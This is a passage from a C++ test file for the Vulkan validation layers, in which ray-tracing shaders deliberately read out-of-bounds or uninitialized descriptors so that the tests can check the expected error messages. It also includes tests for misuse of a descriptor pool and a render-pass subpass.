VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL; } VkWriteDescriptorSet descriptor_writes[3] = {}; descriptor_writes[0].sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; 
descriptor_writes[0].dstSet = ds.set_; descriptor_writes[0].dstBinding = 0; descriptor_writes[0].descriptorCount = 1; descriptor_writes[0].descriptorType = VK_DESCRIPTOR_TYPE_ACCELERATION_STRUCTURE_NV; descriptor_writes[0].pNext = &write_descript_set_as; descriptor_writes[1].sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_writes[1].dstSet = ds.set_; descriptor_writes[1].dstBinding = 1; descriptor_writes[1].descriptorCount = 1; descriptor_writes[1].descriptorType = VK_DESCRIPTOR_TYPE_STORAGE_BUFFER; descriptor_writes[1].pBufferInfo = &descriptor_buffer_info; descriptor_writes[2].sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_writes[2].dstSet = ds.set_; descriptor_writes[2].dstBinding = 2; if (descriptor_indexing) { descriptor_writes[2].descriptorCount = 5; // Intentionally don't write index 5 } else { descriptor_writes[2].descriptorCount = 6; } descriptor_writes[2].descriptorType = VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER; descriptor_writes[2].pImageInfo = descriptor_image_infos; vk::UpdateDescriptorSets(m_device->device(), 3, descriptor_writes, 0, NULL); if (descriptor_indexing) { descriptor_writes[0].dstSet = ds_variable.set_; descriptor_writes[1].dstSet = ds_variable.set_; descriptor_writes[2].dstSet = ds_variable.set_; vk::UpdateDescriptorSets(m_device->device(), 3, descriptor_writes, 0, NULL); } const VkPipelineLayoutObj pipeline_layout(m_device, {&ds.layout_}); const VkPipelineLayoutObj pipeline_layout_variable(m_device, {&ds_variable.layout_}); const auto SetImagesArrayLength = [](const std::string &shader_template, const std::string &length_str) { const std::string to_replace = "IMAGES_ARRAY_LENGTH"; std::string result = shader_template; auto position = result.find(to_replace); assert(position != std::string::npos); result.replace(position, to_replace.length(), length_str); return result; }; const std::string rgen_source_template = R"(#version 460 #extension GL_EXT_nonuniform_qualifier : require #extension GL_EXT_samplerless_texture_functions : require #extension GL_NV_ray_tracing : require layout(set = 0, binding = 0) uniform accelerationStructureNV topLevelAS; layout(set = 0, binding = 1, std430) buffer RayTracingSbo { uint rgen_index; uint ahit_index; uint chit_index; uint miss_index; uint intr_index; uint call_index; uint rgen_ran; uint ahit_ran; uint chit_ran; uint miss_ran; uint intr_ran; uint call_ran; float result1; float result2; float result3; } sbo; layout(set = 0, binding = 2) uniform texture2D textures[IMAGES_ARRAY_LENGTH]; layout(location = 0) rayPayloadNV vec3 payload; layout(location = 3) callableDataNV vec3 callableData; void main() { sbo.rgen_ran = 1; executeCallableNV(0, 3); sbo.result1 = callableData.x; vec3 origin = vec3(0.0f, 0.0f, -2.0f); vec3 direction = vec3(0.0f, 0.0f, 1.0f); traceNV(topLevelAS, gl_RayFlagsNoneNV, 0xFF, 0, 1, 0, origin, 0.001, direction, 10000.0, 0); sbo.result2 = payload.x; traceNV(topLevelAS, gl_RayFlagsNoneNV, 0xFF, 0, 1, 0, origin, 0.001, -direction, 10000.0, 0); sbo.result3 = payload.x; if (sbo.rgen_index > 0) { // OOB here: sbo.result3 = texelFetch(textures[sbo.rgen_index], ivec2(0, 0), 0).x; } } )"; const std::string rgen_source = SetImagesArrayLength(rgen_source_template, "6"); const std::string rgen_source_runtime = SetImagesArrayLength(rgen_source_template, ""); const std::string ahit_source_template = R"(#version 460 #extension GL_EXT_nonuniform_qualifier : require #extension GL_EXT_samplerless_texture_functions : require #extension GL_NV_ray_tracing : require layout(set = 0, binding = 1, std430) buffer 
StorageBuffer { uint rgen_index; uint ahit_index; uint chit_index; uint miss_index; uint intr_index; uint call_index; uint rgen_ran; uint ahit_ran; uint chit_ran; uint miss_ran; uint intr_ran; uint call_ran; float result1; float result2; float result3; } sbo; layout(set = 0, binding = 2) uniform texture2D textures[IMAGES_ARRAY_LENGTH]; hitAttributeNV vec3 hitValue; layout(location = 0) rayPayloadInNV vec3 payload; void main() { sbo.ahit_ran = 2; payload = vec3(0.1234f); if (sbo.ahit_index > 0) { // OOB here: payload.x = texelFetch(textures[sbo.ahit_index], ivec2(0, 0), 0).x; } } )"; const std::string ahit_source = SetImagesArrayLength(ahit_source_template, "6"); const std::string ahit_source_runtime = SetImagesArrayLength(ahit_source_template, ""); const std::string chit_source_template = R"(#version 460 #extension GL_EXT_nonuniform_qualifier : require #extension GL_EXT_samplerless_texture_functions : require #extension GL_NV_ray_tracing : require layout(set = 0, binding = 1, std430) buffer RayTracingSbo { uint rgen_index; uint ahit_index; uint chit_index; uint miss_index; uint intr_index; uint call_index; uint rgen_ran; uint ahit_ran; uint chit_ran; uint miss_ran; uint intr_ran; uint call_ran; float result1; float result2; float result3; } sbo; layout(set = 0, binding = 2) uniform texture2D textures[IMAGES_ARRAY_LENGTH]; layout(location = 0) rayPayloadInNV vec3 payload; hitAttributeNV vec3 attribs; void main() { sbo.chit_ran = 3; payload = attribs; if (sbo.chit_index > 0) { // OOB here: payload.x = texelFetch(textures[sbo.chit_index], ivec2(0, 0), 0).x; } } )"; const std::string chit_source = SetImagesArrayLength(chit_source_template, "6"); const std::string chit_source_runtime = SetImagesArrayLength(chit_source_template, ""); const std::string miss_source_template = R"(#version 460 #extension GL_EXT_nonuniform_qualifier : enable #extension GL_EXT_samplerless_texture_functions : require #extension GL_NV_ray_tracing : require layout(set = 0, binding = 1, std430) buffer RayTracingSbo { uint rgen_index; uint ahit_index; uint chit_index; uint miss_index; uint intr_index; uint call_index; uint rgen_ran; uint ahit_ran; uint chit_ran; uint miss_ran; uint intr_ran; uint call_ran; float result1; float result2; float result3; } sbo; layout(set = 0, binding = 2) uniform texture2D textures[IMAGES_ARRAY_LENGTH]; layout(location = 0) rayPayloadInNV vec3 payload; void main() { sbo.miss_ran = 4; payload = vec3(1.0, 0.0, 0.0); if (sbo.miss_index > 0) { // OOB here: payload.x = texelFetch(textures[sbo.miss_index], ivec2(0, 0), 0).x; } } )"; const std::string miss_source = SetImagesArrayLength(miss_source_template, "6"); const std::string miss_source_runtime = SetImagesArrayLength(miss_source_template, ""); const std::string intr_source_template = R"(#version 460 #extension GL_EXT_nonuniform_qualifier : require #extension GL_EXT_samplerless_texture_functions : require #extension GL_NV_ray_tracing : require layout(set = 0, binding = 1, std430) buffer StorageBuffer { uint rgen_index; uint ahit_index; uint chit_index; uint miss_index; uint intr_index; uint call_index; uint rgen_ran; uint ahit_ran; uint chit_ran; uint miss_ran; uint intr_ran; uint call_ran; float result1; float result2; float result3; } sbo; layout(set = 0, binding = 2) uniform texture2D textures[IMAGES_ARRAY_LENGTH]; hitAttributeNV vec3 hitValue; void main() { sbo.intr_ran = 5; hitValue = vec3(0.0f, 0.5f, 0.0f); reportIntersectionNV(1.0f, 0); if (sbo.intr_index > 0) { // OOB here: hitValue.x = texelFetch(textures[sbo.intr_index], ivec2(0, 0), 
0).x; } } )"; const std::string intr_source = SetImagesArrayLength(intr_source_template, "6"); const std::string intr_source_runtime = SetImagesArrayLength(intr_source_template, ""); const std::string call_source_template = R"(#version 460 #extension GL_EXT_nonuniform_qualifier : require #extension GL_EXT_samplerless_texture_functions : require #extension GL_NV_ray_tracing : require layout(set = 0, binding = 1, std430) buffer StorageBuffer { uint rgen_index; uint ahit_index; uint chit_index; uint miss_index; uint intr_index; uint call_index; uint rgen_ran; uint ahit_ran; uint chit_ran; uint miss_ran; uint intr_ran; uint call_ran; float result1; float result2; float result3; } sbo; layout(set = 0, binding = 2) uniform texture2D textures[IMAGES_ARRAY_LENGTH]; layout(location = 3) callableDataInNV vec3 callableData; void main() { sbo.call_ran = 6; callableData = vec3(0.1234f); if (sbo.call_index > 0) { // OOB here: callableData.x = texelFetch(textures[sbo.call_index], ivec2(0, 0), 0).x; } } )"; const std::string call_source = SetImagesArrayLength(call_source_template, "6"); const std::string call_source_runtime = SetImagesArrayLength(call_source_template, ""); struct TestCase { const std::string &rgen_shader_source; const std::string &ahit_shader_source; const std::string &chit_shader_source; const std::string &miss_shader_source; const std::string &intr_shader_source; const std::string &call_shader_source; bool variable_length; uint32_t rgen_index; uint32_t ahit_index; uint32_t chit_index; uint32_t miss_index; uint32_t intr_index; uint32_t call_index; const char *expected_error; }; std::vector<TestCase> tests; tests.push_back({rgen_source, ahit_source, chit_source, miss_source, intr_source, call_source, false, 25, 0, 0, 0, 0, 0, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({rgen_source, ahit_source, chit_source, miss_source, intr_source, call_source, false, 0, 25, 0, 0, 0, 0, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({rgen_source, ahit_source, chit_source, miss_source, intr_source, call_source, false, 0, 0, 25, 0, 0, 0, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({rgen_source, ahit_source, chit_source, miss_source, intr_source, call_source, false, 0, 0, 0, 25, 0, 0, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({rgen_source, ahit_source, chit_source, miss_source, intr_source, call_source, false, 0, 0, 0, 0, 25, 0, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({rgen_source, ahit_source, chit_source, miss_source, intr_source, call_source, false, 0, 0, 0, 0, 0, 25, "Index of 25 used to index descriptor array of length 6."}); if (descriptor_indexing) { tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 25, 0, 0, 0, 0, 0, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 25, 0, 0, 0, 0, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 0, 25, 0, 0, 0, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, 
intr_source_runtime, call_source_runtime, true, 0, 0, 0, 25, 0, 0, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 0, 0, 0, 25, 0, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 0, 0, 0, 0, 25, "Index of 25 used to index descriptor array of length 6."}); // For this group, 6 is less than max specified (max specified is 8) but more than actual specified (actual specified is 5) tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 6, 0, 0, 0, 0, 0, "Index of 6 used to index descriptor array of length 6."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 6, 0, 0, 0, 0, "Index of 6 used to index descriptor array of length 6."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 0, 6, 0, 0, 0, "Index of 6 used to index descriptor array of length 6."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 0, 0, 6, 0, 0, "Index of 6 used to index descriptor array of length 6."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 0, 0, 0, 6, 0, "Index of 6 used to index descriptor array of length 6."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 0, 0, 0, 0, 6, "Index of 6 used to index descriptor array of length 6."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 5, 0, 0, 0, 0, 0, "Descriptor index 5 is uninitialized."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 5, 0, 0, 0, 0, "Descriptor index 5 is uninitialized."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 0, 5, 0, 0, 0, "Descriptor index 5 is uninitialized."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 0, 0, 5, 0, 0, "Descriptor index 5 is uninitialized."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 0, 0, 0, 5, 0, "Descriptor index 5 is uninitialized."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 0, 0, 0, 0, 5, "Descriptor index 5 is uninitialized."}); } PFN_vkCreateRayTracingPipelinesNV vkCreateRayTracingPipelinesNV = reinterpret_cast<PFN_vkCreateRayTracingPipelinesNV>( vk::GetDeviceProcAddr(m_device->handle(), "vkCreateRayTracingPipelinesNV")); 
ASSERT_TRUE(vkCreateRayTracingPipelinesNV != nullptr); PFN_vkGetRayTracingShaderGroupHandlesNV vkGetRayTracingShaderGroupHandlesNV = reinterpret_cast<PFN_vkGetRayTracingShaderGroupHandlesNV>( vk::GetDeviceProcAddr(m_device->handle(), "vkGetRayTracingShaderGroupHandlesNV")); ASSERT_TRUE(vkGetRayTracingShaderGroupHandlesNV != nullptr); PFN_vkCmdTraceRaysNV vkCmdTraceRaysNV = reinterpret_cast<PFN_vkCmdTraceRaysNV>(vk::GetDeviceProcAddr(m_device->handle(), "vkCmdTraceRaysNV")); ASSERT_TRUE(vkCmdTraceRaysNV != nullptr); // Iteration 0 tests with no descriptor set bound (to sanity test "draw" validation). Iteration 1 // tests what's in the test case vector. for (int i = 0; i < 2; ++i) { for (const auto &test : tests) { if (i == 1) { m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, test.expected_error); } VkShaderObj rgen_shader(m_device, test.rgen_shader_source.c_str(), VK_SHADER_STAGE_RAYGEN_BIT_NV, this, "main"); VkShaderObj ahit_shader(m_device, test.ahit_shader_source.c_str(), VK_SHADER_STAGE_ANY_HIT_BIT_NV, this, "main"); VkShaderObj chit_shader(m_device, test.chit_shader_source.c_str(), VK_SHADER_STAGE_CLOSEST_HIT_BIT_NV, this, "main"); VkShaderObj miss_shader(m_device, test.miss_shader_source.c_str(), VK_SHADER_STAGE_MISS_BIT_NV, this, "main"); VkShaderObj intr_shader(m_device, test.intr_shader_source.c_str(), VK_SHADER_STAGE_INTERSECTION_BIT_NV, this, "main"); VkShaderObj call_shader(m_device, test.call_shader_source.c_str(), VK_SHADER_STAGE_CALLABLE_BIT_NV, this, "main"); VkPipelineShaderStageCreateInfo stage_create_infos[6] = {}; stage_create_infos[0].sType = VK_STRUCTURE_TYPE_PIPELINE_SHADER_STAGE_CREATE_INFO; stage_create_infos[0].stage = VK_SHADER_STAGE_RAYGEN_BIT_NV; stage_create_infos[0].module = rgen_shader.handle(); stage_create_infos[0].pName = "main"; stage_create_infos[1].sType = VK_STRUCTURE_TYPE_PIPELINE_SHADER_STAGE_CREATE_INFO; stage_create_infos[1].stage = VK_SHADER_STAGE_ANY_HIT_BIT_NV; stage_create_infos[1].module = ahit_shader.handle(); stage_create_infos[1].pName = "main"; stage_create_infos[2].sType = VK_STRUCTURE_TYPE_PIPELINE_SHADER_STAGE_CREATE_INFO; stage_create_infos[2].stage = VK_SHADER_STAGE_CLOSEST_HIT_BIT_NV; stage_create_infos[2].module = chit_shader.handle(); stage_create_infos[2].pName = "main"; stage_create_infos[3].sType = VK_STRUCTURE_TYPE_PIPELINE_SHADER_STAGE_CREATE_INFO; stage_create_infos[3].stage = VK_SHADER_STAGE_MISS_BIT_NV; stage_create_infos[3].module = miss_shader.handle(); stage_create_infos[3].pName = "main"; stage_create_infos[4].sType = VK_STRUCTURE_TYPE_PIPELINE_SHADER_STAGE_CREATE_INFO; stage_create_infos[4].stage = VK_SHADER_STAGE_INTERSECTION_BIT_NV; stage_create_infos[4].module = intr_shader.handle(); stage_create_infos[4].pName = "main"; stage_create_infos[5].sType = VK_STRUCTURE_TYPE_PIPELINE_SHADER_STAGE_CREATE_INFO; stage_create_infos[5].stage = VK_SHADER_STAGE_CALLABLE_BIT_NV; stage_create_infos[5].module = call_shader.handle(); stage_create_infos[5].pName = "main"; VkRayTracingShaderGroupCreateInfoNV group_create_infos[4] = {}; group_create_infos[0].sType = VK_STRUCTURE_TYPE_RAY_TRACING_SHADER_GROUP_CREATE_INFO_NV; group_create_infos[0].type = VK_RAY_TRACING_SHADER_GROUP_TYPE_GENERAL_NV; group_create_infos[0].generalShader = 0; // rgen group_create_infos[0].closestHitShader = VK_SHADER_UNUSED_NV; group_create_infos[0].anyHitShader = VK_SHADER_UNUSED_NV; group_create_infos[0].intersectionShader = VK_SHADER_UNUSED_NV; group_create_infos[1].sType = VK_STRUCTURE_TYPE_RAY_TRACING_SHADER_GROUP_CREATE_INFO_NV; 
group_create_infos[1].type = VK_RAY_TRACING_SHADER_GROUP_TYPE_GENERAL_NV; group_create_infos[1].generalShader = 3; // miss group_create_infos[1].closestHitShader = VK_SHADER_UNUSED_NV; group_create_infos[1].anyHitShader = VK_SHADER_UNUSED_NV; group_create_infos[1].intersectionShader = VK_SHADER_UNUSED_NV; group_create_infos[2].sType = VK_STRUCTURE_TYPE_RAY_TRACING_SHADER_GROUP_CREATE_INFO_NV; group_create_infos[2].type = VK_RAY_TRACING_SHADER_GROUP_TYPE_PROCEDURAL_HIT_GROUP_NV; group_create_infos[2].generalShader = VK_SHADER_UNUSED_NV; group_create_infos[2].closestHitShader = 2; group_create_infos[2].anyHitShader = 1; group_create_infos[2].intersectionShader = 4; group_create_infos[3].sType = VK_STRUCTURE_TYPE_RAY_TRACING_SHADER_GROUP_CREATE_INFO_NV; group_create_infos[3].type = VK_RAY_TRACING_SHADER_GROUP_TYPE_GENERAL_NV; group_create_infos[3].generalShader = 5; // call group_create_infos[3].closestHitShader = VK_SHADER_UNUSED_NV; group_create_infos[3].anyHitShader = VK_SHADER_UNUSED_NV; group_create_infos[3].intersectionShader = VK_SHADER_UNUSED_NV; VkRayTracingPipelineCreateInfoNV pipeline_ci = {}; pipeline_ci.sType = VK_STRUCTURE_TYPE_RAY_TRACING_PIPELINE_CREATE_INFO_NV; pipeline_ci.stageCount = 6; pipeline_ci.pStages = stage_create_infos; pipeline_ci.groupCount = 4; pipeline_ci.pGroups = group_create_infos; pipeline_ci.maxRecursionDepth = 2; pipeline_ci.layout = test.variable_length ? pipeline_layout_variable.handle() : pipeline_layout.handle(); VkPipeline pipeline = VK_NULL_HANDLE; ASSERT_VK_SUCCESS( vkCreateRayTracingPipelinesNV(m_device->handle(), VK_NULL_HANDLE, 1, &pipeline_ci, nullptr, &pipeline)); std::vector<uint8_t> shader_binding_table_data; shader_binding_table_data.resize(static_cast<std::size_t>(shader_binding_table_buffer_size), 0); ASSERT_VK_SUCCESS(vkGetRayTracingShaderGroupHandlesNV(m_device->handle(), pipeline, 0, 4, static_cast<std::size_t>(shader_binding_table_buffer_size), shader_binding_table_data.data())); uint8_t *mapped_shader_binding_table_data = (uint8_t *)shader_binding_table_buffer.memory().map(); std::memcpy(mapped_shader_binding_table_data, shader_binding_table_data.data(), shader_binding_table_data.size()); shader_binding_table_buffer.memory().unmap(); ray_tracing_command_buffer.begin(); vk::CmdBindPipeline(ray_tracing_command_buffer.handle(), VK_PIPELINE_BIND_POINT_RAY_TRACING_NV, pipeline); if (i == 1) { vk::CmdBindDescriptorSets(ray_tracing_command_buffer.handle(), VK_PIPELINE_BIND_POINT_RAY_TRACING_NV, test.variable_length ? pipeline_layout_variable.handle() : pipeline_layout.handle(), 0, 1, test.variable_length ? 
&ds_variable.set_ : &ds.set_, 0, nullptr); } else { m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdTraceRaysNV-None-02697"); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "UNASSIGNED-CoreValidation-DrawState-DescriptorSetNotBound"); } vkCmdTraceRaysNV(ray_tracing_command_buffer.handle(), shader_binding_table_buffer.handle(), ray_tracing_properties.shaderGroupHandleSize * 0ull, shader_binding_table_buffer.handle(), ray_tracing_properties.shaderGroupHandleSize * 1ull, ray_tracing_properties.shaderGroupHandleSize, shader_binding_table_buffer.handle(), ray_tracing_properties.shaderGroupHandleSize * 2ull, ray_tracing_properties.shaderGroupHandleSize, shader_binding_table_buffer.handle(), ray_tracing_properties.shaderGroupHandleSize * 3ull, ray_tracing_properties.shaderGroupHandleSize, /*width=*/1, /*height=*/1, /*depth=*/1); ray_tracing_command_buffer.end(); // Update the index of the texture that the shaders should read uint32_t *mapped_storage_buffer_data = (uint32_t *)storage_buffer.memory().map(); mapped_storage_buffer_data[0] = test.rgen_index; mapped_storage_buffer_data[1] = test.ahit_index; mapped_storage_buffer_data[2] = test.chit_index; mapped_storage_buffer_data[3] = test.miss_index; mapped_storage_buffer_data[4] = test.intr_index; mapped_storage_buffer_data[5] = test.call_index; mapped_storage_buffer_data[6] = 0; mapped_storage_buffer_data[7] = 0; mapped_storage_buffer_data[8] = 0; mapped_storage_buffer_data[9] = 0; mapped_storage_buffer_data[10] = 0; mapped_storage_buffer_data[11] = 0; storage_buffer.memory().unmap(); vk::QueueSubmit(ray_tracing_queue, 1, &submit_info, VK_NULL_HANDLE); vk::QueueWaitIdle(ray_tracing_queue); m_errorMonitor->VerifyFound(); mapped_storage_buffer_data = (uint32_t *)storage_buffer.memory().map(); if (i == 1) { ASSERT_TRUE(mapped_storage_buffer_data[6] == 1); ASSERT_TRUE(mapped_storage_buffer_data[7] == 2); ASSERT_TRUE(mapped_storage_buffer_data[8] == 3); ASSERT_TRUE(mapped_storage_buffer_data[9] == 4); ASSERT_TRUE(mapped_storage_buffer_data[10] == 5); ASSERT_TRUE(mapped_storage_buffer_data[11] == 6); } storage_buffer.memory().unmap(); vk::DestroyPipeline(m_device->handle(), pipeline, nullptr); } } } TEST_F(VkLayerTest, InvalidDescriptorPoolConsistency) { VkResult err; TEST_DESCRIPTION("Allocate descriptor sets from one DS pool and attempt to delete them from another."); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkFreeDescriptorSets-pDescriptorSets-parent"); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); VkDescriptorPoolSize ds_type_count = {}; ds_type_count.type = VK_DESCRIPTOR_TYPE_SAMPLER; ds_type_count.descriptorCount = 1; VkDescriptorPoolCreateInfo ds_pool_ci = {}; ds_pool_ci.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_POOL_CREATE_INFO; ds_pool_ci.pNext = NULL; ds_pool_ci.flags = 0; ds_pool_ci.maxSets = 1; ds_pool_ci.poolSizeCount = 1; ds_pool_ci.pPoolSizes = &ds_type_count; VkDescriptorPool bad_pool; err = vk::CreateDescriptorPool(m_device->device(), &ds_pool_ci, NULL, &bad_pool); ASSERT_VK_SUCCESS(err); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_SAMPLER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); err = vk::FreeDescriptorSets(m_device->device(), bad_pool, 1, &descriptor_set.set_); m_errorMonitor->VerifyFound(); vk::DestroyDescriptorPool(m_device->device(), bad_pool, NULL); } TEST_F(VkLayerTest, DrawWithPipelineIncompatibleWithSubpass) { TEST_DESCRIPTION("Use a pipeline for the wrong subpass in a render pass instance"); 
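    // The render pass below has two subpasses writing the same color attachment; the pipeline is built against
    // subpass 0, and both subtests expect the "built for subpass 0 but used in subpass 1" message when it is
    // used after vkCmdNextSubpass.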
ASSERT_NO_FATAL_FAILURE(Init()); // A renderpass with two subpasses, both writing the same attachment. VkAttachmentDescription attach[] = { {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_UNDEFINED, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, }; VkAttachmentReference ref = {0, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}; VkSubpassDescription subpasses[] = { {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 1, &ref, nullptr, nullptr, 0, nullptr}, {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 1, &ref, nullptr, nullptr, 0, nullptr}, }; VkSubpassDependency dep = {0, 1, VK_PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT, VK_PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT, VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT, VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT, VK_DEPENDENCY_BY_REGION_BIT}; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 1, attach, 2, subpasses, 1, &dep}; VkRenderPass rp; VkResult err = vk::CreateRenderPass(m_device->device(), &rpci, nullptr, &rp); ASSERT_VK_SUCCESS(err); VkImageObj image(m_device); image.InitNoLayout(32, 32, 1, VK_FORMAT_R8G8B8A8_UNORM, VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL, 0); VkImageView imageView = image.targetView(VK_FORMAT_R8G8B8A8_UNORM); VkFramebufferCreateInfo fbci = {VK_STRUCTURE_TYPE_FRAMEBUFFER_CREATE_INFO, nullptr, 0, rp, 1, &imageView, 32, 32, 1}; VkFramebuffer fb; err = vk::CreateFramebuffer(m_device->device(), &fbci, nullptr, &fb); ASSERT_VK_SUCCESS(err); VkShaderObj vs(m_device, bindStateVertShaderText, VK_SHADER_STAGE_VERTEX_BIT, this); VkShaderObj fs(m_device, bindStateFragShaderText, VK_SHADER_STAGE_FRAGMENT_BIT, this); VkPipelineObj pipe(m_device); pipe.AddDefaultColorAttachment(); pipe.AddShader(&vs); pipe.AddShader(&fs); VkViewport viewport = {0.0f, 0.0f, 64.0f, 64.0f, 0.0f, 1.0f}; m_viewports.push_back(viewport); pipe.SetViewport(m_viewports); VkRect2D rect = {}; m_scissors.push_back(rect); pipe.SetScissor(m_scissors); const VkPipelineLayoutObj pl(m_device); pipe.CreateVKPipeline(pl.handle(), rp); m_commandBuffer->begin(); VkRenderPassBeginInfo rpbi = {VK_STRUCTURE_TYPE_RENDER_PASS_BEGIN_INFO, nullptr, rp, fb, {{ 0, 0, }, {32, 32}}, 0, nullptr}; // subtest 1: bind in the wrong subpass vk::CmdBeginRenderPass(m_commandBuffer->handle(), &rpbi, VK_SUBPASS_CONTENTS_INLINE); vk::CmdNextSubpass(m_commandBuffer->handle(), VK_SUBPASS_CONTENTS_INLINE); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "built for subpass 0 but used in subpass 1"); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdDraw(m_commandBuffer->handle(), 3, 1, 0, 0); m_errorMonitor->VerifyFound(); vk::CmdEndRenderPass(m_commandBuffer->handle()); // subtest 2: bind in correct subpass, then transition to next subpass vk::CmdBeginRenderPass(m_commandBuffer->handle(), &rpbi, VK_SUBPASS_CONTENTS_INLINE); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdNextSubpass(m_commandBuffer->handle(), VK_SUBPASS_CONTENTS_INLINE); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "built for subpass 0 but used in subpass 1"); vk::CmdDraw(m_commandBuffer->handle(), 3, 1, 0, 0); m_errorMonitor->VerifyFound(); vk::CmdEndRenderPass(m_commandBuffer->handle()); m_commandBuffer->end(); vk::DestroyFramebuffer(m_device->device(), fb, nullptr); 
